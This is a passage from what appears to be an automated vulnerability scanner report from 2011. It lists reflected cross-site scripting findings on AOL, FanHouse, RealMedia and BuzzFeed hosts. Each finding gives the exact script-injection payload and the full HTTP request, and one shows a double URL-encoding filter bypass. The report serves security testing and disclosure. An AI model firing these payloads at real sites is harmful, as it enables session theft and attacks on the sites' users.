HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:49:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:39 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d5e"><script>alert(1)</script>1a204efbd96 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secureb2d5e"><script>alert(1)</script>1a204efbd96/642496272@Bottom3?_RM_HTML_MM_=500101500015500001101 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:49:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:41 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cb47"><script>alert(1)</script>3d74b029401 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom32cb47"><script>alert(1)</script>3d74b029401?_RM_HTML_MM_=500101500015500001101 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:49:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 389 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:44 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83b2b"-alert(1)-"6894311a107 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3?_RM_HTML_MM_=50010150001550000110183b2b"-alert(1)-"6894311a107 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:49:37 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: RMFD=011PmBY9O10M69; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 601 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:37 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "50010150001550000110183b2b"-alert(1)-"6894311a107"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
1.166. http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d5c"><script>alert(1)</script>a72c54c0017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/06/01/long-weekend-getaways-within-the-united-states/?96d5c"><script>alert(1)</script>a72c54c0017=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/?96d5c"><script>alert(1)</script>a72c54c0017=1" /> ...[SNIP]...
1.167. http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21590"><script>alert(1)</script>0c2f336d704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/?21590"><script>alert(1)</script>0c2f336d704=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/?21590"><script>alert(1)</script>0c2f336d704=1" /> ...[SNIP]...
1.168. http://news.travel.aol.com/2011/01/12/travel-myths-debunked/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://news.travel.aol.com
Path:
/2011/01/12/travel-myths-debunked/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de56"><script>alert(1)</script>fa2fd84284b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/12/travel-myths-debunked/?5de56"><script>alert(1)</script>fa2fd84284b=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2011/01/12/travel-myths-debunked/?5de56"><script>alert(1)</script>fa2fd84284b=1" /> ...[SNIP]...
1.169. http://news.travel.aol.com/2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d2d5"><script>alert(1)</script>d79e2e7793e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/?4d2d5"><script>alert(1)</script>d79e2e7793e=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a1e"><script>alert(1)</script>7f2ad4a8dc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/virginia-hotel-casts-out-snow-refugees/?a9a1e"><script>alert(1)</script>7f2ad4a8dc9=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2011/02/04/virginia-hotel-casts-out-snow-refugees/?a9a1e"><script>alert(1)</script>7f2ad4a8dc9=1" /> ...[SNIP]...
1.171. http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5186"><script>alert(1)</script>a0c68995fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/?b5186"><script>alert(1)</script>a0c68995fa0=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/?b5186"><script>alert(1)</script>a0c68995fa0=1" /> ...[SNIP]...
1.172. http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a878f"><script>alert(1)</script>e0f1e935f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/american-plane-and-air-force-jets-in-near-miss/?a878f"><script>alert(1)</script>e0f1e935f50=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/?a878f"><script>alert(1)</script>e0f1e935f50=1" /> ...[SNIP]...
1.173. http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://news.travel.aol.com
Path:
/best-of/when-is-ash-wednesday-2011/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15cf3"><script>alert(1)</script>4e8bf31abab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /best-of/when-is-ash-wednesday-2011/?15cf3"><script>alert(1)</script>4e8bf31abab=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/?15cf3"><script>alert(1)</script>4e8bf31abab=1" /> ...[SNIP]...
1.174. http://news.travel.aol.com/explore-america/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://news.travel.aol.com
Path:
/explore-america/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc0f9"><script>alert(1)</script>d8df1da81dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /explore-america/?fc0f9"><script>alert(1)</script>d8df1da81dc=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="alternate" type= ...[SNIP]... <link rel="canonical" href="http://news.travel.aol.com/explore-america/?fc0f9"><script>alert(1)</script>d8df1da81dc=1" /> ...[SNIP]...
1.175. http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://news.travel.aol.com
Path:
/hotel/inside-the-royalton-in-new-york-city/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82562"><script>alert(1)</script>fa0b25a6bcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel/inside-the-royalton-in-new-york-city/?82562"><script>alert(1)</script>fa0b25a6bcf=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/?82562"><script>alert(1)</script>fa0b25a6bcf=1" /> ...[SNIP]...
1.176. http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://news.travel.aol.com
Path:
/hotel/los-angeles-hotels-near-lax/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9529f"><script>alert(1)</script>db864afbfc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel/los-angeles-hotels-near-lax/?9529f"><script>alert(1)</script>db864afbfc3=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/?9529f"><script>alert(1)</script>db864afbfc3=1" /> ...[SNIP]...
1.177. http://nfl.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nfl.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9200f"-alert(1)-"9027b25266b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9200f"-alert(1)-"9027b25266b=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fdd"><script>alert(1)</script>96eb04b239 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /superbowlf1fdd"><script>alert(1)</script>96eb04b239 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8568c"-alert(1)-"007a301d86a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /superbowl8568c"-alert(1)-"007a301d86a HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.180. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nfl.fanhouse.com
Path:
/superbowl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2724f"><script>alert(1)</script>d81db27d9b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /superbowl?2724f"><script>alert(1)</script>d81db27d9b5=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/superbowl?2724f"><script>alert(1)</script>d81db27d9b5=1"/> ...[SNIP]...
1.181. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nfl.fanhouse.com
Path:
/superbowl
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0873"-alert(1)-"cfe39284596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /superbowl?e0873"-alert(1)-"cfe39284596=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.182. http://nhl.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nhl.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d0e"-alert(1)-"693917f6b35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?79d0e"-alert(1)-"693917f6b35=1 HTTP/1.1 Host: nhl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8256c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17094e0f3fe was submitted in the REST URL parameter 2. This input was echoed as 8256c</script><script>alert(1)</script>17094e0f3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/latino-news8256c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17094e0f3fe/ HTTP/1.1 Host: noticias.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 93d1a<a>32b91cfbcdc was submitted in the c parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 14885<script>alert(1)</script>c21e4d75bd1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12659/989cc9ecbfd3d382e27b06d49f58dc6f?callback=BF_PARTNER.gate_response14885<script>alert(1)</script>c21e4d75bd1&cb=3913 HTTP/1.1 Host: pglb.buzzfed.com Proxy-Connection: keep-alive Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=ISO-8859-1 Server: lighttpd Content-Length: 79 Cache-Control: max-age=604794 Expires: Sun, 13 Feb 2011 20:54:34 GMT Date: Sun, 06 Feb 2011 20:54:40 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6dc58<script>alert(1)</script>2112900b8a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsonmfus/ws?service=symslist,markets&symbols=E:DJI:$INDU,E:NAI:$COMPX,E:CMI:$INX,E:BSS:(TC10Y,E:ISE:UKX,E:FX1:N225,E:FX1:HSIX,E:FX1:EURUSD,E:FX1:USDJPY,E:DEI:DAX,E:FX1:GBPUSD,E:FX1:USDCHF,E:CMX:/GC\J11,E:NYM:/CL\H11,E:NYM:/PL\J11,E:NYM:/NG\J11,E:NYS:C,E:NYS:BAC,E:NYS:SPY,E:NYS:S,E:NYS:KV.A,E:NYS:KV.B,E:NYS:NPTN,E:NYS:EEE,E:NYS:CPX,E:NYS:DQ,E:NYS:GMXR,E:NYS:LVS&porttype=2&portmax=100&callback=rebuildLiveHash6dc58<script>alert(1)</script>2112900b8a8&rf=http://www.dailyfinance.com HTTP/1.1 Host: portal.pf.aol.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021680436-New%7C1360093680436%3B%20s_nrgvo%3DNew%7C1360093680440%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
